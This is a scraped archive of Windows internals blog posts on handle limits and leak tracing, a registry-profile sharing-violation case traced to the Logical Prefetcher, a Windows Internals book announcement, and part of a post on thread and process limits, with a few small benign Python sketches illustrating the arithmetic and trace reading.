32,768 pages on 32-bit Windows and 65,536 pages on 64-bit Windows. 
Because the Executive uses the first entry of each page for its own tracking information, the number of handles available to a process is actually 16,777,216 minus those numbers, which explains the results obtained by Testlimit: on 64-bit Windows 16,777,216-65,536 is 16,711,680, and on 32-bit Windows 16,777,216-32,768 is 16,744,448. </P> <H4> Handles and Paged Pool </H4> <P> The second limit affecting handles is the amount of memory required to store handle tables, which the Executive allocates from paged pool. The Executive uses a three-level scheme, similar to the way that processor Memory Management Units (MMUs) manage virtual to physical address translations, to keep track of the handle table pages that it allocates. We’ve already seen the organization of the lowest and mid levels, which store actual handle table entries. The top level serves as pointers into the mid-level tables and includes 1024 entries per page on 32-bit Windows. The total paged pool required to store the maximum number of handles can therefore be calculated for 32-bit Windows as 16,777,216/512*4096 bytes, which is 128MB. That’s consistent with the paged pool usage of Testlimit as shown in Task Manager: </P> <P> <IMG alt="image" border="0" height="46" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_5.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121171iACBEA5DC37E45F58" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="184" /> </P> <P> On 64-bit Windows, there are 256 pointers in a page of top-level pointers. That means the total paged pool usage for a full handle table is 16,777,216/256*4096 bytes, which is 256MB. 
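</P> <P> The arithmetic in this section and the previous one is easy to reproduce. The sketch below uses only figures stated in the text (the hard-coded maximum, the 4096-byte page, and the 8- and 16-byte entry sizes); the function name <EM> handle_limits </EM> is made up for the example. </P>

```python
MAX_HANDLES = 16 * 1024 * 1024   # hard-coded per-process maximum: 16,777,216
PAGE_SIZE = 4096                 # bytes per page on both x86 and x64


def handle_limits(entry_size):
    """Return (entries per page, pages, usable handles, paged pool bytes)."""
    entries_per_page = PAGE_SIZE // entry_size
    pages = MAX_HANDLES // entries_per_page
    usable = MAX_HANDLES - pages          # first entry of each page is reserved
    pool_bytes = pages * PAGE_SIZE
    return entries_per_page, pages, usable, pool_bytes


for label, entry_size in (("32-bit", 8), ("64-bit", 16)):
    per_page, pages, usable, pool = handle_limits(entry_size)
    print(f"{label}: {per_page} entries/page, {pages:,} pages, "
          f"{usable:,} usable handles, {pool // (1024 * 1024)} MB paged pool")
```

<P> Running it prints 16,744,448 usable handles and 128 MB for 32-bit Windows, and 16,711,680 usable handles and 256 MB for 64-bit Windows. </P> <P>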
A look at Testlimit’s paged pool usage on 64-bit Windows confirms the calculation: </P> <P> <IMG alt="image" border="0" height="42" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_6.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121172iB3E89B34B67FEAFC" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="188" /> </P> <P> Paged pool is generally large enough to more than accommodate those sizes, but as I stated earlier, a process that creates that many handles is almost certainly going to exhaust other resources, and if it reaches the per-process handle limit it will probably fail itself because it can’t open any other objects. </P> <H4> Handle Leaks </H4> <P> A handle leaker will have a handle count that rises over time. The reason that a handle leak is so insidious is that unlike the handles Testlimit creates, which all point to the same object, a process leaking handles is probably leaking objects as well. For example, if a process creates events but fails to close them, it will leak both handle entries and event objects. Event objects consume nonpaged pool, so the leak will impact nonpaged pool in addition to paged pool. </P> <P> You can graphically spot the objects a process is leaking using Process Explorer’s handle view because it highlights new handles in green and closed handles in red; if you see lots of green with infrequent red then you might be seeing a leak. You can watch Process Explorer’s handle highlighting in action by opening a Command Prompt process, selecting the process in Process Explorer, opening the handle-view lower pane and then changing directory in the Command Prompt. 
The old working directory’s handle will highlight in red and the new one in green: </P> <P> <IMG alt="image" border="0" height="137" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_8.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121173i88B5CB5A9C9CCD9C" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="277" /> </P> <P> By default, Process Explorer only shows handles that reference objects that have names, which means that you won’t see all the handles a process is using unless you select <EM> Show Unnamed Handles and Mappings </EM> from the View menu. Here are some of the unnamed handles in Command Prompt’s handle table: </P> <P> <IMG alt="image" border="0" height="144" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_14.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_14.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121174i2B2ABF693BE52C14" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="384" /> </P> <P> Just like most bugs, only the developer of the code that’s leaking can fix it. If you spot a leak in a process that can host multiple components or extensions, like Explorer, a Service Host or Internet Explorer, then the question is what component is the one responsible for the leak. 
Figuring that out might enable you to avoid the problem by disabling or uninstalling the problematic extension, fix the problem by checking for an update, or report the bug to the vendor. </P> <P> Fortunately, Windows includes a handle tracing facility that you can use to help identify leaks and the responsible software. It’s enabled on a per-process basis and when active causes the Executive to record a stack trace at the time every handle is created or closed. You can enable it either by using the <A href="#" mce_href="#" target="_blank"> Application Verifier </A> , a free download from Microsoft, or by using the <A href="#" mce_href="#" target="_blank"> Windows Debugger </A> (Windbg). You should use the Application Verifier if you want the system to track a process’s handle activity from when it starts. In either case, you’ll need to use a debugger and the <A href="#" mce_href="#" target="_blank"> !htrace </A> debugger command to view the trace information. </P> <P> To demonstrate the tracing in action, I launched Windbg and attached to the Command Prompt I had opened earlier. I then executed the !htrace command with the <EM> –enable </EM> switch to turn on handle tracing: </P> <P> <IMG alt="image" border="0" height="102" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_20.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_20.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121175i549A7734BCD4E4C5" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="464" /> </P> <P> I let the process’s execution continue and changed directory again. 
Then I switched back to Windbg, stopped the process’s execution, and executed !htrace without any options, which has it list all the open and close operations the process executed since the previous !htrace snapshot (created with the <EM> –snapshot </EM> option) or from when handle tracing was enabled. Here’s the output of the command for the same session: </P> <P> <IMG alt="image" border="0" height="830" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_16.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_16.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121176i66ECE9FAF818A629" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The events are printed from most recent operation to least, so reading from the bottom, Command Prompt opened handle 0xb8, then closed it, next opened handle 0x22c, and finally closed handle 0xec. Process Explorer would show handle 0x22c in green and 0xec in red if it was refreshed after the directory change, but probably wouldn’t see 0xb8 unless it happened to refresh between the open and close of that handle. The stack for 0x22c’s open reveals that it was the result of Command Prompt (cmd.exe) executing its ChangeDirectory function. 
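</P> <P> The net effect of such a trace can be worked out mechanically. The sketch below is an illustration only: it replays the four operations from the trace above, oldest first, and reports which handles remain open and which pre-existing handles were closed. The function name and the tuple format are invented for the example and have nothing to do with the debugger's real output format. </P>

```python
def net_handle_changes(events):
    """Replay (operation, handle) pairs, oldest first.

    Returns two sets: handles opened during the trace and still open,
    and handles closed during the trace that were opened before it began.
    """
    still_open = set()
    closed_preexisting = set()
    for op, handle in events:
        if op == "open":
            still_open.add(handle)
        elif op == "close":
            if handle in still_open:
                still_open.remove(handle)       # opened and closed within the trace
            else:
                closed_preexisting.add(handle)  # opened before tracing started
    return still_open, closed_preexisting


# The four operations from the trace, in the order they happened.
trace = [("open", 0xB8), ("close", 0xB8), ("open", 0x22C), ("close", 0xEC)]
still_open, closed_preexisting = net_handle_changes(trace)
print("new and still open:", [hex(h) for h in sorted(still_open)])
print("closed, opened earlier:", [hex(h) for h in sorted(closed_preexisting)])
```

<P> For this trace the only handle left open is 0x22c, and the only pre-existing handle that was closed is 0xec. A process that is leaking would show the first set growing from one snapshot to the next. </P> <P>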
Adding the handle value column to Process Explorer confirms that the new handle is 0x22c: </P> <P> <IMG alt="image" border="0" height="76" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_17.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_17.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121177iCAD68F7BF36BB1E9" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="234" /> </P> <P> If you’re just looking for leaks, you should use !htrace with the <EM> –diff </EM> switch, which has it show only new handles since the last snapshot or start of tracing. Executing that command shows just handle 0x22c, as expected: </P> <P> <IMG alt="image" border="0" height="255" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_15.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_15.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121178i722B7719E02B7BC4" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Finally, a great video that presents more tips for debugging handle leaks is this Channel 9 interview with Jeff Dailey, a Microsoft Escalation Engineer who debugs them for a living: <A href="#" mce_href="#" title="https://channel9.msdn.com/posts/jeff_dailey/Understanding-handle-leaks-and-how-to-use-htrace-to-find-them/" target="_blank"> https://channel9.msdn.com/posts/jeff_dailey/Understanding-handle-leaks-and-how-to-use-htrace-to-find-them/ </A> </P> <P> Next time I’ll look 
at limits for a couple of other handle-based resources, GDI Objects and USER Objects. Handles to those resources are managed by the Windows subsystem, not the Executive, so they use different resources and have different limits. </P> </BODY></HTML> Thu, 27 Jun 2019 06:57:18 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-handles/ba-p/723848 MarkRussinovich 2019-06-27T06:57:18Z The Case of the Temporary Registry Profiles https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-temporary-registry-profiles/ba-p/723832 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Aug 10, 2009 </STRONG> <BR /> <P> Microsoft Customer Support Services (CSS) is one of the biggest customers of the Sysinternals tools and they often send me interesting cases they’ve solved with them. This particular case is especially interesting because it affected a large number of users and the troubleshooting process made use of one of <A href="#" target="_blank"> Process Monitor’s </A> lesser-known features. The case opened when a customer contacted Microsoft support reporting that several of their users would occasionally get this error message when logging on to their systems: </P> <P> <IMG alt="image" border="0" height="161" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheNewLogonRegistryProfiles_DF02/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121159iF5E14BB28D5AAA3B" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="324" /> </P> <P> This caused Windows to create a temporary profile for the user’s logon session. 
A user profile consists of a directory, %UserProfile%, into which applications save user-specific configuration and data files, as well as a registry hive file stored in that directory, %UserProfile%\Ntuser.dat, that the Winlogon process loads when the user logs in. Applications store user settings in the registry hive by calling registry functions that refer to the HKEY_CURRENT_USER (HKCU) root key. The user’s loss of access to their profile made the problem critical, because whenever that happened, the user would apparently lose all their settings and access to files stored in their profile directory. In most cases, users contacted the company’s support desk, which would ask the user to try rebooting and logging in until the problem resolved itself. </P> <P> As with all cases, Microsoft support began by asking about the system configuration, inventory of installed software, and about any recent changes the company had made to their systems. In this case, the fact that stood out was that all the systems on which the problem had occurred had recently been upgraded to a new version of Citrix Corporation's ICA client, a remote desktop application. Microsoft contacted Citrix support to see if they knew of any issues with the new client. They didn’t, but said they would investigate. </P> <P> Unsure whether the ICA client upgrade was responsible for the profile problem, Microsoft support instructed the customer to enable profile logging, which you can do by configuring a registry key as per this Knowledge Base article: <A href="#" target="_blank"> How to enable user environment debug logging in retail builds of Windows </A> . The customer pushed a script out to their systems to make the required registry changes and shortly after got another call from a user with the profile problem. They grabbed a copy of the profile log off the system from %SystemRoot%\Debug\UserMode\Userenv.log and sent it into Microsoft. 
The log was inconclusive, but did provide an important clue: it indicated that the user’s profile had failed to load because of error 32, which is <A href="#" target="_blank"> ERROR_SHARING_VIOLATION </A> : </P> <P> <IMG alt="image" border="0" height="70" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheNewLogonRegistryProfiles_DF02/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121160i97F72B62C0E964C4" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> When a process opens a file, it specifies what kinds of sharing it allows for the file. If it is writing to the file it may allow other processes to read from the file, for example, but not to also write to the file. The sharing violation in the log file meant that another process had opened the user’s registry hive in a way that was incompatible with the way that the logon process wanted to open the file. </P> <P> In the meantime, more customers around the world began contacting Microsoft and Citrix with the same issue; all had also deployed the new ICA client. Citrix support then reported that they suspected that the sharing violation might be caused by one of the ICA client’s processes, Ssonsvr.exe. During installation, the ICA client registers a Network Provider DLL (Pnsson.dll) that the Windows Multiple Provider Notification Application (%SystemRoot%\System32\Mpnotify.exe) calls when the system boots. 
Mpnotify.exe is itself launched at logon by the Winlogon process. The Citrix notification DLL launches the Ssonsvr.exe process asynchronously to the user’s logon: </P> <P> <IMG alt="image" border="0" height="264" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheNewLogonRegistryProfiles_DF02/image_thumb_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121161i6CDB52EC6B0D1402" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="450" /> </P> <P> The only problem with the theory was that Citrix developers insisted that the process did not attempt to load any user registry profile or even read any keys or values from one. Both Microsoft and Citrix were stumped. </P> <P> Microsoft created a version of Winlogon and the kernel with additional diagnostic information and tried to reproduce the problem on lab systems configured identically to the client’s, but without success. The customer couldn’t even reproduce the problem with the modified Windows images, presumably because the images changed the timing of the system enough to avoid the problem. At this point a Microsoft support engineer suggested that the customer capture a trace of logon activity with Process Monitor. </P> <P> There are a couple of ways to configure Process Monitor to record logon operations: one is to use <A href="#" target="_blank"> Sysinternals PsExec </A> to launch it in session 0 so that it survives the logoff and subsequent logon and another is to use the boot logging feature to capture activity from early in the boot, including the logon. The engineer chose the latter, so he told the customer to run Process Monitor on one of the systems that persistently exhibited the problem, select Enable Boot Logging from the Process Monitor Options menu, and reboot, repeating the steps until the problem reproduced. 
This procedure configures the Process Monitor driver to load early in the boot process and log activity to %SystemRoot%\Procmon.pmb. Once the user logged on and encountered the issue, they were to run Process Monitor again, at which point the driver would stop logging and Process Monitor would offer to convert the boot log into a standard Process Monitor log file. </P> <P> After a couple of attempts the user captured a boot log file that they submitted to Microsoft. Microsoft support engineers scanned through the log and came across the sharing violation error when Winlogon tried to load the user’s registry hive: </P> <P> <IMG alt="image" border="0" height="114" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheNewLogonRegistryProfiles_DF02/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121162i3A3F779C738EB387" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> It was obvious from operations immediately preceding the error that Ssonsvr.exe was the process that had the hive opened. The question was, why was Ssonsvr.exe opening the registry hive? To answer that question the engineers turned to Process Monitor’s stack trace functionality. Process Monitor captures a call stack for every operation, which represents the function call nesting responsible for the operation. By looking at a call stack you can often determine an operation’s root cause when it might not be obvious just from the process that executed it. For example, the stack shows you if a DLL loaded into the process executed the operation and, if you have symbols configured and the call originates in a Windows image or other image for which you have symbols, it will even show you the names of the responsible functions. 
</P> <P> The stack for Ssonsvr.exe’s open of the Ntuser.dat file showed that Ssonsvr.exe wasn’t actually responsible for the operation, the Windows Logical Prefetcher was: </P> <P> <IMG alt="image" border="0" height="170" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheNewLogonRegistryProfiles_DF02/image_thumb_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121163i215FCDD4E6E657EB" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="429" /> </P> <P> Introduced in Windows XP, the Logical Prefetcher is a kernel component that monitors the first ten seconds of a process launch, recording the directories and portions of files accessed by the process during that time to a file it stores in %SystemRoot%\Prefetch. So that multiple executables with the same name but in different directories get their own prefetch file, the Logical Prefetcher gives the file a name that’s a concatenation of the executable image name and the hash of the path in which the image is stored e.g. NOTEPAD.EXE-D8414F97.pf. You can actually see the files and directories the Logical Prefetcher saw an application reference the last time it launched by using the Sysinternals <A href="#" target="_blank"> Strings </A> utility to scan a prefetch file like this: </P> <P> <FONT face="Courier New"> strings &lt;prefetch file&gt; </FONT> </P> <P> The next time the application launches, the Logical Prefetcher, executing in the context of the process’s first thread, looks for a prefetch file. If one exists, it opens each directory it lists to bring the directory’s metadata into memory if not already present. The Logical Prefetcher then maps each file listed in the prefetch file and references the portions accessed the last time the application ran so that they also get brought into memory. 
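</P> <P> Returning to the Strings command shown above, the same idea can be approximated in a short Python script for readers who want to see what such a scan involves. This is a rough sketch, not a reimplementation of Strings: it assumes the names of interest are stored as UTF-16LE text (two bytes per character), it only looks for printable ASCII characters, and the function name and minimum length are arbitrary choices made for illustration. </P>

```python
import re


def utf16le_strings(data, min_chars=4):
    """Return runs of printable ASCII characters stored as UTF-16LE in data."""
    # Each character is one printable ASCII byte followed by a zero byte.
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_chars)
    return [match.group().decode("utf-16-le") for match in pattern.finditer(data)]


# Synthetic bytes standing in for file contents: binary noise around a name.
sample = b"\x01\x02" + "NOTEPAD.EXE".encode("utf-16-le") + b"\xff\xff"
print(utf16le_strings(sample))  # ['NOTEPAD.EXE']
```

<P> To try it on a real file, read the file in binary mode and pass the resulting bytes to the function. </P> <P>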
The Logical Prefetcher can speed up an application launch because it generates large, sequential I/Os instead of issuing small random accesses to file data as the application would typically do during startup. </P> <P> The implication of the Logical Prefetcher in the profile problem only raised more questions, however. Why was it prefetching the user’s hive file in the context of Ssonsvr.exe when Ssonsvr.exe itself never accesses registry profiles? Microsoft support contacted the Logical Prefetcher’s development team for the answer. The developers first noted that the registry on Windows XP is read into memory using cached file I/O operations, which means that the Cache Manager’s read-ahead thread will proactively read portions of the hive. Since the read-ahead thread executes in the System process, and the Logical Prefetcher associates System process activity with the currently launching process, a specific timing sequence of process launches and activity during the boot and log on could cause hive accesses to be seen by the Logical Prefetcher as being part of the Ssonsvr.exe launch. If the order was slightly different the next boot and log on, Winlogon might collide with the Logical Prefetcher, as seen in the captured boot log. </P> <P> The Logical Prefetcher is supposed to execute transparently to other activity on a system, but its file references can lead to sharing violations like this on Windows XP systems (on server systems the Logical Prefetcher only prefetches boot activity, and it does so synchronously before the boot process proceeds). For that reason, on Windows Vista and Windows 7 systems, the Logical Prefetcher makes use of a file system minifilter driver, Fileinfo (%SystemRoot%\System32\Drivers\Fileinfo.sys), to watch for potential sharing violation collisions and prevent them by stalling a second open operation on a file being accessed by the Logical Prefetcher until the Logical Prefetcher closes the file. 
</P> <P> Now that the problem was understood, Microsoft and Citrix brainstormed on workarounds customers could apply while Citrix worked on an update to the ICA Client that would prevent the sharing violation. One workaround was to disable application prefetching and another was to write a logoff script that deletes the Ssonsvr.exe prefetch files. Citrix published the workarounds in this <A href="#" target="_blank"> Citrix Knowledge Base </A> article and Microsoft in this <A href="#" target="_blank"> Microsoft Knowledge Base </A> article. The update to the ICA Client, which was made available a few days later, changed the network provider DLL to wait 10 seconds after Ssonsvr.exe launches before returning control to Mpnotify.exe. Because Winlogon waits for Mpnotify to exit before logging on a user, the Logical Prefetcher won’t associate Winlogon’s accesses of the user’s hive with Ssonsvr.exe’s startup. </P> <P> As I said in the introduction, I find this case particularly interesting because it demonstrates a little known Process Monitor feature, boot logging, and the power of stack traces for root cause analysis, two key tools for everyone’s troubleshooting arsenal. It also shows how successful troubleshooting sometimes means coming up with a workaround when there’s no fix or you must wait until a vendor provides one. Another case successfully closed with Process Monitor! Please keep sending me screen shots and log files of the cases you solve. </P> </BODY></HTML> Thu, 27 Jun 2019 06:55:38 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-temporary-registry-profiles/ba-p/723832 MarkRussinovich 2019-06-27T06:55:38Z Windows Internals 5th Edition is Available! 
https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/windows-internals-5th-edition-is-available/ba-p/723826 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jul 06, 2009 </STRONG> <BR /> <P> I’m proud to announce that Windows Internals, 5th Edition is now available. It’s been a long road, but writing a book of this scope <IMG align="right" alt="image" border="0" height="244" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/WindowsInternals5thEditionReleased_5408/image_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121158iD3495D83DD8D0D99" style="border-right-width: 0px; margin: 0px 0px 0px 15px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="190" /> is an incredibly detailed endeavor. This new edition covers Windows Vista and Windows Server 2008 (32-bit and 64-bit) and besides revisions and enhancements to existing content, adds an additional 250 pages, bringing the total page count to over 1200 (25% longer than the previous edition). Besides new experiments highlighting the Sysinternals tools, new topics covered include Hyper-V, the image loader, debugging infrastructure, Kernel Transaction Manager, Code Integrity, Thread Pools, Mandatory Integrity Controls, Windows Driver Framework, and Bitlocker, to name a few. </P> <P> We decided not to keep coverage of Windows XP and Windows Server 2003 because describing the commonalities and differences in certain areas where there have been significant changes across versions would have been complicated and confusing. However, 99% of the book applies directly to Windows 7 and Windows Server 2008 R2, so you can get a jump start while we work on the 6 <SUP> th </SUP> edition, which will add coverage of these new versions of Windows. 
We anticipate adding another 75-100 pages of content (and not making any significant changes to existing text) and are shooting to have the book completed by the end of the year. </P> <P> You can watch me and <A href="#" target="_blank"> David Solomon </A> talking about the book and our history of collaboration in <A href="#" target="_blank"> this Channel 9 interview </A> we recorded a couple of weeks ago. David and I coauthored the previous two editions alone, but this time around we add a third contributor, <A href="#" target="_blank"> Alex Ionescu </A> . Alex came to our attention back when he was a primary contributor to the kernel of the ReactOS project, an attempt to develop an open source clone of Windows. Alex now teaches Windows internals training classes with David Solomon, including on campus here at Microsoft like I used to do before I joined Microsoft. Needless to say, Alex was a valuable addition to our team on this revision of the book. </P> <P> Be sure to visit the official <A href="#" target="_blank"> Windows Internals book page </A> , where you can find more information on the book’s contents, errata (there is none at this point), and the downloads for the book’s demonstration programs like Testlimit, a tool that I’ve used in some of my <A href="#" target="_blank"> Pushing the Limits of Windows </A> blog posts to highlight various resource limits in Windows. </P> <P> I have one more thing I want to share with you, <A href="#" target="_blank"> a video </A> that the Windows marketing team put together as part of the <A href="#" target="_blank"> Talking About Windows </A> campaign that has elementary school students Sam and Trevor talking about Sysinternals. I didn’t know about the video until they sent it to me, and I have to admit that besides being flattered, I laughed out loud. 
</P> </BODY></HTML> Thu, 27 Jun 2019 06:55:01 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/windows-internals-5th-edition-is-available/ba-p/723826 MarkRussinovich 2019-06-27T06:55:01Z Pushing the Limits of Windows: Processes and Threads https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-processes-and-threads/ba-p/723824 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jul 05, 2009 </STRONG> <BR /> <P> This is the fourth post in my Pushing the Limits of Windows series that explores the boundaries of fundamental resources in Windows. This time, I’m going to discuss the limits on the maximum number of threads and processes supported on Windows. I’ll briefly describe the difference between a thread and a process, survey thread limits and then investigate process limits. I cover thread limits first since every active process has at least one thread (a process that’s terminated, but is kept referenced by a handle owned by another process won’t have any), so the limit on processes is directly affected by the caps that limit threads. </P> <P> Unlike some UNIX variants, most resources in Windows have no fixed upper bound compiled into the operating system, but rather derive their limits based on basic operating system resources that I’ve already covered. Processes and threads, for example, require physical memory, virtual memory, and pool memory, so the number of processes or threads that can be created on a given Windows system is ultimately determined by one of these resources, depending on the way that the processes or threads are created and which constraint is hit first. I therefore recommend that you read the preceding posts if you haven’t, because I’ll be referring to reserved memory, committed memory, the system commit limit and other concepts I’ve covered. Here’s the index of the entire Pushing the Limits series. 
While they can stand on their own, they assume that you read them in order. </P> <BLOCKQUOTE> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Physical Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Virtual Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Paged and Nonpaged Pool </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Processes and Threads </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Handles </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: USER and GDI Objects – Part 1 </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: USER and GDI Objects – Part 2 </A> </P> </BLOCKQUOTE> <H3> Processes and Threads </H3> <P> A Windows process is essentially a container that hosts the execution of an executable image file. It is represented with a kernel process object and Windows uses the process object and its associated data structures to store and track information about the image’s execution. For example, a process has a virtual address space that holds the process’s private and shared data and into which the executable image and its associated DLLs are mapped. Windows records the process’s use of resources for accounting and query by diagnostic tools and it registers the process’s references to operating system objects in the process’s handle table. Processes operate with a security context, called a token, that identifies the user account, account groups, and privileges assigned to the process. </P> <P> Finally, a process includes one or more threads that actually execute the code in the process (technically, processes don’t run, threads do) and that are represented with kernel thread objects. 
There are several reasons applications create threads in addition to their default initial thread: processes with a user interface typically create threads to execute work so that the main thread remains responsive to user input and windowing commands; applications that want to take advantage of multiple processors for scalability or that want to continue executing while threads are tied up waiting for synchronous I/O operations to complete also benefit from multiple threads. </P> <H3> Thread Limits </H3> <P> Besides basic information about a thread, including its CPU register state, scheduling priority, and resource usage accounting, every thread has a portion of the process address space assigned to it, called a stack, which the thread can use as scratch storage as it executes program code to pass function parameters, maintain local variables, and save function return addresses. So that the system’s virtual memory isn’t unnecessarily wasted, only part of the stack is initially allocated, or committed, and the rest is simply reserved. Because stacks grow downward in memory, the system places guard pages beyond the committed part of the stack that trigger an automatic commitment of additional memory (called a stack expansion) when accessed. 
This figure shows how a stack’s committed region grows down and the guard page moves when the stack expands, with a 32-bit address space as an example (not drawn to scale): </P> <P> <IMG alt="image" border="0" height="346" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_C851/image_thumb_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121136i3336D2B9F1BF1905" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="320" /> </P> <P> The Portable Executable (PE) structures of the executable image specify the amount of address space reserved and initially committed for a thread’s stack. The linker defaults to a reserve of 1MB and commit of one page (4K), but developers can override these values either by changing the PE values when they link their program or for an individual thread in a call to <A href="#" target="_blank"> CreateThread </A> . You can use a tool like <A href="#" target="_blank"> Dumpbin </A> that comes with Visual Studio to look at the settings for an executable. 
